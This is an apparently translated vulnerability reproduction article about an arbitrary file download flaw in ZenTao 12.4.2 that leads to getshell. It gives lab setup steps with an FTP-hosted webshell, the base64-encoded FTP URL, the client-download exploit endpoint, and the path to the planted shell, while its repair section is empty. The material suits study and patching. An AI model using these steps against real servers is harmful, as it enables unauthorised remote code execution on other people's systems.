Home >Operation and Maintenance >Safety >What are the background administrator rights of Getshell in ZenTao 12.4.2?
ZenTao is a professional domestic open source R&D project management software that integrates product management and project management , quality management, document management, organizational management and transaction management, completely covering the core processes of R&D project management. The management idea is based on the internationally popular agile project management method - Scrum. On the basis of following its values, combined with the current status of domestic project research and development, it integrates multiple functions such as task management, demand management, bug management, use case management, etc., covering software from planning to to the entire life cycle of a release.
ZenTao 12.4.2 version has an arbitrary file download vulnerability. This vulnerability is due to the loose filtering in the download method in the client class, which can be achieved using ftp. Purpose of downloading files. And the downloaded file storage directory can parse php files, causing getshell.
ZenTao≤ 12.4.2
phpstudy2018 Zen Tao 12.4.2 Zen Tao official download address:
https://www.zentao.net/dynamic/zentaopms12.4.2-80263.html
3.1. After the download is completed, put it into phpstudy Just install it in
#3.2. Check the extension. If there is an extension that fails, just open the extension in phpstudy.
#3.3. Set the database information, set it to your own database configuration here.
3.4. Set up the account and the installation is completed
##3.4. Use the environment to set up and enable the ftp service. Taking windows2008R2 as an example, add roles and add ftp##3.5. Then in the Internet Information Service Add ftp service to the website below.
3.6. Configure according to your own situation, and the next step is
3.7. Place a webshell in the ftp directory and use the browser to check whether ftp can be accessed normally
0x04 Vulnerability RecurrenceBefore encryption: ftp://192.168.3.200/shell.php
After encryption: ZnRwJTNBLy8xOTIuMTY4LjMuMjAwL3NoZWxsLnBocA==
2. Use EXP and put the encrypted base64 into the in exp
http://127.0.0.1/zentaopms/www/index.php /client-download-1-
##3. Use the following link path to test Whether the shell has been downloaded to the server
http://192.168.3.200/zentaopms/www/data/client/1/shell.php0x05 Repair method
The above is the detailed content of What are the background administrator rights of Getshell in ZenTao 12.4.2?. For more information, please follow other related articles on the PHP Chinese website!